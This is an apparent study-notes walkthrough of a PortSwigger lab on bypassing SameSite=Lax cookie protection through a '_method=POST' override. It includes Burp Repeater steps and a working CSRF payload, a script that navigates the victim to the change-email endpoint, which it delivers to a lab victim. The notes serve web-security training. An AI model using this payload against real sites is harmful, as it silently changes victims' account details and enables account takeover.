[This lab](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-lax-bypass-via-method-override) showcases how **SameSite=Lax** cookie protection can be bypassed if the app allows a **GET request with `_method=POST`**, enabling CSRF via **top-level navigation**. Since Chrome allows cookies on top-level **GET requests** under SameSite=Lax, we can abuse that with a crafted CSRF payload.
##### Step 1: Understand the Session Behavior
1. Log in as `wiener:peter`
2. Submit an email change (e.g., `
[email protected]`)
3. In **Burp → Proxy → HTTP history**, inspect:
```http
POST /my-account/change-email
[email protected]
```
➡ No CSRF token, just a session cookie
![[CleanShot 2025-04-23 at 19.57.00.png]]
---
##### Step 2: Analyze SameSite Behavior
1. Look at the **Set-Cookie** response from `/login`
```http
Set-Cookie: session=abc123
```
❌ No `SameSite=None` → browser uses default: `SameSite=Lax`
✅ This means:
- **POST requests from other origins**: ❌ no cookie sent
- **GET requests via top-level navigation**: ✅ cookie **is** sent
---
##### Step 3: Test Method Override
1. Send the POST request to **Burp Repeater**
2. Right-click → **Change request method → GET**
```http
GET /my-account/
[email protected]&_method=POST
```
✅ Response: email changed
🎯 This endpoint accepts `_method=POST` via query string → **bypass enabled**
![[CleanShot 2025-04-23 at 19.58.44.png]]
---
#### Step 4: Build the Exploit
Use a **top-level navigation** to make the request with `_method=POST` in the query:
```html
<script>
location = "https://YOUR-LAB-ID.web-security-academy.net/my-account/
[email protected]&_method=POST";
</script>
```
> ✅ This triggers a GET request, including the session cookie
> ✅ Server treats it as a POST due to `_method=POST`
---
#### Step 5: Launch the Attack
1. Go to the **Exploit Server**
2. Paste the above payload into the **Body**
3. Click **Store**
4. Click **View exploit** to test it on yourself
- Email should be changed ✅
5. Change the email to something unique like:
```html
[email protected]
```
6. Click **Deliver to victim**
✅ Lab is **solved** when the victim’s email is changed
---
### 🔍 Summary
|Behavior|Exploit|
|---|---|
|Cookies use SameSite=Lax|✅ Allows GET w/ top-level navigation|
|Server requires POST|✅ Accepts `_method=POST` override|
|Final vector|GET + `_method=POST` + auto-navigation|
|Bypass method|`<script>document.location = "..."</script>`|